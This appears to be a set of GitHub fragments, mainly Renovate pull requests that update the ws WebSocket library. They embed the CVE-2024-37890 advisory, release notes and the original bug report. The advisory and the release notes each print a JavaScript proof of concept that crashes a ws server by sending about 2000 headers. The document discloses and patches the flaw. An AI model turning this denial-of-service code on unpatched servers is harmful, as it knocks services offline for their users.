[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - "before 4am on Monday,before 4am on Thursday" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/weareinreach/TransMascFutures). PR-URL: #436 Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. ### GitHub Vulnerability Alerts #### [CVE-2024-37890](https://togithub.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q) ### Impact A request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server. ### Proof of concept ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` ### Patches The vulnerability was fixed in ws@8.17.1 (websockets/ws@e55e510) and backported to ws@7.5.10 (websockets/ws@22c2876), ws@6.2.3 (websockets/ws@eeb76d3), and ws@5.2.4 (websockets/ws@4abd8f6) ### Workarounds In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. ### Credits The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). ### References - [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230) - [https://github.com/websockets/ws/pull/2231](https://togithub.com/websockets/ws/pull/2231) [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#​2231](https://togithub.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View the [repository job log](https://developer.mend.io/github/camunda/camunda). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yMC4xIiwidXBkYXRlZEluVmVyIjoiMzguMjAuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiYXJlYS9zZWN1cml0eSIsImF1dG9tZXJnZSJdfQ==-->
Is there an existing issue for this?
Description
I use this package for a websocket server. In the process of changing some options to try to make my websocket server slightly more resistant to DoS, I lowered the maxHeadersCount field on the HTTP server from its default of 2000 to a lower value. I then tested to see whether the server would reject requests with too many headers. Instead, the server crashed due to a
TypeError
from websocket-server.js line 246. This seems like a DoS issue.I found this similar issue: #1838
ws version
8.17.0
Node.js Version
v21.5.0
System
OS: Debian GNU/Linux 12 (bookworm)
CPU: x64 Intel Core i5 CPU
Memory: 2.62 GB / 6.58 GB
Container: Yes
Shell: /bin/bash
Expected result
I expected the websocket server to refuse the handshake. Maybe respond with a 400 Bad Request. I did not expect my server app to crash from a
TypeError
.Actual result
Attachments
No response
The text was updated successfully, but these errors were encountered: